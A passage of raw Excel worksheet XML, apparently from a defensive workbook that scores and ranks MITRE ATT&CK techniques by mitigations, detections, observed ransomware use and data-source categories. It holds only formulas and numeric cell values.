        <f t="array" ref="AG551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD551)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH551" s="37">
        <v>547</v>
      </c>
      <c r="AI551" s="37" t="str" cm="1">
        <f t="array" ref="AI551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD551)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ551" s="37">
        <v>547</v>
      </c>
      <c r="AK551" s="37" t="str" cm="1">
        <f t="array" ref="AK551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD551)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL551" s="37">
        <v>547</v>
      </c>
      <c r="AM551" s="37" t="str" cm="1">
        <f t="array" ref="AM551">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD551)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN551" s="37">
        <v>0</v>
      </c>
      <c r="AO551" s="37">
        <v>1</v>
      </c>
      <c r="AP551" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ551" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>36.483333333333334</v>
      </c>
      <c r="AR551" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS551" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT551" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU55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0.89246031746031751</v>
      </c>
    </row>
    <row r="552" spans="1:47" ht="17">
      <c r="A552" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B552" s="37">
        <f t="shared" si="8"/>
        <v>140.97857142857143</v>
      </c>
      <c r="C552" s="37" t="s">
        <v>1857</v>
      </c>
      <c r="D552" s="50" t="s">
        <v>1848</v>
      </c>
      <c r="E552" s="37" t="s">
        <v>1858</v>
      </c>
      <c r="F552" s="37">
        <v>0</v>
      </c>
      <c r="G552" s="37">
        <v>1</v>
      </c>
      <c r="H552" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I552" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J552" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K552" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L552" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M552" s="37">
        <v>0</v>
      </c>
      <c r="N552" s="56">
        <v>0</v>
      </c>
      <c r="O552" s="56">
        <v>1</v>
      </c>
      <c r="P552" s="56">
        <v>0</v>
      </c>
      <c r="Q552" s="56">
        <v>2</v>
      </c>
      <c r="R552" s="57"/>
      <c r="S552" s="57">
        <v>0</v>
      </c>
      <c r="T552" s="57"/>
      <c r="U552" s="57">
        <v>0</v>
      </c>
      <c r="V552" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W552" s="37">
        <v>0</v>
      </c>
      <c r="X552" s="37">
        <v>0</v>
      </c>
      <c r="Y552" s="37">
        <v>0</v>
      </c>
      <c r="Z552" s="37">
        <v>3</v>
      </c>
      <c r="AA552" s="37">
        <v>0.03</v>
      </c>
      <c r="AB552" s="37">
        <v>0.03</v>
      </c>
      <c r="AC552" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD552" s="50"/>
      <c r="AE552" s="37" t="str" cm="1">
        <f t="array" ref="AE552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD552)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF552" s="37">
        <v>548</v>
      </c>
      <c r="AG552" s="37" t="str" cm="1">
        <f t="array" ref="AG552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD552)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH552" s="37">
        <v>548</v>
      </c>
      <c r="AI552" s="37" t="str" cm="1">
        <f t="array" ref="AI552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD552)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ552" s="37">
        <v>548</v>
      </c>
      <c r="AK552" s="37" t="str" cm="1">
        <f t="array" ref="AK552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD552)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL552" s="37">
        <v>548</v>
      </c>
      <c r="AM552" s="37" t="str" cm="1">
        <f t="array" ref="AM552">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD552)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN552" s="37">
        <v>0</v>
      </c>
      <c r="AO552" s="37">
        <v>0</v>
      </c>
      <c r="AP552" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ552" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>46.99285714285714</v>
      </c>
      <c r="AR552" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS552" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT552" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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53" spans="1:47" ht="34">
      <c r="A553" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B553" s="37">
        <f t="shared" si="8"/>
        <v>120.31190476190476</v>
      </c>
      <c r="C553" s="37" t="s">
        <v>1859</v>
      </c>
      <c r="D553" s="50" t="s">
        <v>1860</v>
      </c>
      <c r="E553" s="37"/>
      <c r="F553" s="37">
        <v>0</v>
      </c>
      <c r="G553" s="37">
        <v>1</v>
      </c>
      <c r="H553" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I553" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J553" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K553" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L553" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M553" s="37">
        <v>0</v>
      </c>
      <c r="N553" s="56">
        <v>0</v>
      </c>
      <c r="O553" s="56">
        <v>0</v>
      </c>
      <c r="P553" s="56">
        <v>0</v>
      </c>
      <c r="Q553" s="56">
        <v>1</v>
      </c>
      <c r="R553" s="57"/>
      <c r="S553" s="57">
        <v>0</v>
      </c>
      <c r="T553" s="57"/>
      <c r="U553" s="57">
        <v>0</v>
      </c>
      <c r="V553" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W553" s="37">
        <v>0</v>
      </c>
      <c r="X553" s="37">
        <v>0</v>
      </c>
      <c r="Y553" s="37">
        <v>0</v>
      </c>
      <c r="Z553" s="37">
        <v>1</v>
      </c>
      <c r="AA553" s="37">
        <v>0.01</v>
      </c>
      <c r="AB553" s="37">
        <v>0.01</v>
      </c>
      <c r="AC553" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD553" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE553" s="37" t="str" cm="1">
        <f t="array" ref="AE553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD553)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF553" s="37">
        <v>549</v>
      </c>
      <c r="AG553" s="37" t="str" cm="1">
        <f t="array" ref="AG553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD553)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH553" s="37">
        <v>549</v>
      </c>
      <c r="AI553" s="37" t="str" cm="1">
        <f t="array" ref="AI553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD553)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ553" s="37">
        <v>549</v>
      </c>
      <c r="AK553" s="37" t="str" cm="1">
        <f t="array" ref="AK553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD553)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL553" s="37">
        <v>549</v>
      </c>
      <c r="AM553" s="37" t="str" cm="1">
        <f t="array" ref="AM553">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD553)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN553" s="37">
        <v>0</v>
      </c>
      <c r="AO553" s="37">
        <v>0</v>
      </c>
      <c r="AP553" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ553" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.103968253968254</v>
      </c>
      <c r="AR553" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS553" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT553" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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54" spans="1:47" ht="34">
      <c r="A554" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B554" s="37">
        <f t="shared" si="8"/>
        <v>120.53095238095239</v>
      </c>
      <c r="C554" s="37" t="s">
        <v>1861</v>
      </c>
      <c r="D554" s="50" t="s">
        <v>1860</v>
      </c>
      <c r="E554" s="37" t="s">
        <v>1862</v>
      </c>
      <c r="F554" s="37">
        <v>0</v>
      </c>
      <c r="G554" s="37">
        <v>1</v>
      </c>
      <c r="H554" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I554" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J554" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K554" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L554" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M554" s="37">
        <v>0</v>
      </c>
      <c r="N554" s="56">
        <v>0</v>
      </c>
      <c r="O554" s="56">
        <v>0</v>
      </c>
      <c r="P554" s="56">
        <v>0</v>
      </c>
      <c r="Q554" s="56">
        <v>1</v>
      </c>
      <c r="R554" s="57"/>
      <c r="S554" s="57">
        <v>0</v>
      </c>
      <c r="T554" s="57"/>
      <c r="U554" s="57">
        <v>0</v>
      </c>
      <c r="V554" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W554" s="37">
        <v>0</v>
      </c>
      <c r="X554" s="37">
        <v>0</v>
      </c>
      <c r="Y554" s="37">
        <v>0</v>
      </c>
      <c r="Z554" s="37">
        <v>1</v>
      </c>
      <c r="AA554" s="37">
        <v>0.01</v>
      </c>
      <c r="AB554" s="37">
        <v>0.01</v>
      </c>
      <c r="AC554" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD554" s="50"/>
      <c r="AE554" s="37" t="str" cm="1">
        <f t="array" ref="AE554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD554)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF554" s="37">
        <v>550</v>
      </c>
      <c r="AG554" s="37" t="str" cm="1">
        <f t="array" ref="AG554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD554)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH554" s="37">
        <v>550</v>
      </c>
      <c r="AI554" s="37" t="str" cm="1">
        <f t="array" ref="AI554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD554)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ554" s="37">
        <v>550</v>
      </c>
      <c r="AK554" s="37" t="str" cm="1">
        <f t="array" ref="AK554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD554)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL554" s="37">
        <v>550</v>
      </c>
      <c r="AM554" s="37" t="str" cm="1">
        <f t="array" ref="AM554">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD554)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN554" s="37">
        <v>0</v>
      </c>
      <c r="AO554" s="37">
        <v>1</v>
      </c>
      <c r="AP554" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ554" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>40.176984126984131</v>
      </c>
      <c r="AR554" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS554" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT554" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU55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0.98040438397581253</v>
      </c>
    </row>
    <row r="555" spans="1:47" ht="34">
      <c r="A555" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B555" s="37">
        <f t="shared" si="8"/>
        <v>110.25</v>
      </c>
      <c r="C555" s="37" t="s">
        <v>1863</v>
      </c>
      <c r="D555" s="50" t="s">
        <v>1860</v>
      </c>
      <c r="E555" s="37" t="s">
        <v>1864</v>
      </c>
      <c r="F555" s="37">
        <v>0</v>
      </c>
      <c r="G555" s="37">
        <v>1</v>
      </c>
      <c r="H555" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I555" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J555" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K555" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L555" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M555" s="37">
        <v>0</v>
      </c>
      <c r="N555" s="56">
        <v>0</v>
      </c>
      <c r="O555" s="56">
        <v>0</v>
      </c>
      <c r="P555" s="56">
        <v>0</v>
      </c>
      <c r="Q555" s="56">
        <v>0</v>
      </c>
      <c r="R555" s="57"/>
      <c r="S555" s="57">
        <v>0</v>
      </c>
      <c r="T555" s="57"/>
      <c r="U555" s="57">
        <v>0</v>
      </c>
      <c r="V555" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W555" s="37">
        <v>0</v>
      </c>
      <c r="X555" s="37">
        <v>0</v>
      </c>
      <c r="Y555" s="37">
        <v>0</v>
      </c>
      <c r="Z555" s="37">
        <v>0</v>
      </c>
      <c r="AA555" s="37">
        <v>0</v>
      </c>
      <c r="AB555" s="37">
        <v>0</v>
      </c>
      <c r="AC555" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD555" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE555" s="37" t="str" cm="1">
        <f t="array" ref="AE555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD555)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF555" s="37">
        <v>551</v>
      </c>
      <c r="AG555" s="37" t="str" cm="1">
        <f t="array" ref="AG555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD555)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH555" s="37">
        <v>551</v>
      </c>
      <c r="AI555" s="37" t="str" cm="1">
        <f t="array" ref="AI555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD555)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ555" s="37">
        <v>551</v>
      </c>
      <c r="AK555" s="37" t="str" cm="1">
        <f t="array" ref="AK555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD555)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL555" s="37">
        <v>551</v>
      </c>
      <c r="AM555" s="37" t="str" cm="1">
        <f t="array" ref="AM555">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD555)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN555" s="37">
        <v>0</v>
      </c>
      <c r="AO555" s="37">
        <v>0</v>
      </c>
      <c r="AP555" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ555" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>36.75</v>
      </c>
      <c r="AR555" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS555" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT555" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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56" spans="1:47" ht="34">
      <c r="A556" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B556" s="37">
        <f t="shared" si="8"/>
        <v>152.52619047619049</v>
      </c>
      <c r="C556" s="37" t="s">
        <v>1865</v>
      </c>
      <c r="D556" s="50" t="s">
        <v>1860</v>
      </c>
      <c r="E556" s="37" t="s">
        <v>1866</v>
      </c>
      <c r="F556" s="37">
        <v>0</v>
      </c>
      <c r="G556" s="37">
        <v>1</v>
      </c>
      <c r="H556" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I556" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J556" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K556" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L556" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M556" s="37">
        <v>0</v>
      </c>
      <c r="N556" s="56">
        <v>0</v>
      </c>
      <c r="O556" s="56">
        <v>2</v>
      </c>
      <c r="P556" s="56">
        <v>0</v>
      </c>
      <c r="Q556" s="56">
        <v>2</v>
      </c>
      <c r="R556" s="57"/>
      <c r="S556" s="57">
        <v>0</v>
      </c>
      <c r="T556" s="57"/>
      <c r="U556" s="57">
        <v>0</v>
      </c>
      <c r="V556" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W556" s="37">
        <v>0</v>
      </c>
      <c r="X556" s="37">
        <v>0</v>
      </c>
      <c r="Y556" s="37">
        <v>0</v>
      </c>
      <c r="Z556" s="37">
        <v>4</v>
      </c>
      <c r="AA556" s="37">
        <v>0.04</v>
      </c>
      <c r="AB556" s="37">
        <v>0.04</v>
      </c>
      <c r="AC556" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD556" s="50"/>
      <c r="AE556" s="37" t="str" cm="1">
        <f t="array" ref="AE556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF556" s="37">
        <v>552</v>
      </c>
      <c r="AG556" s="37" t="str" cm="1">
        <f t="array" ref="AG556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH556" s="37">
        <v>552</v>
      </c>
      <c r="AI556" s="37" t="str" cm="1">
        <f t="array" ref="AI556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ556" s="37">
        <v>552</v>
      </c>
      <c r="AK556" s="37" t="str" cm="1">
        <f t="array" ref="AK556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL556" s="37">
        <v>552</v>
      </c>
      <c r="AM556" s="37" t="str" cm="1">
        <f t="array" ref="AM556">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD556)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN556" s="37">
        <v>0</v>
      </c>
      <c r="AO556" s="37">
        <v>1</v>
      </c>
      <c r="AP556" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ556" s="37">
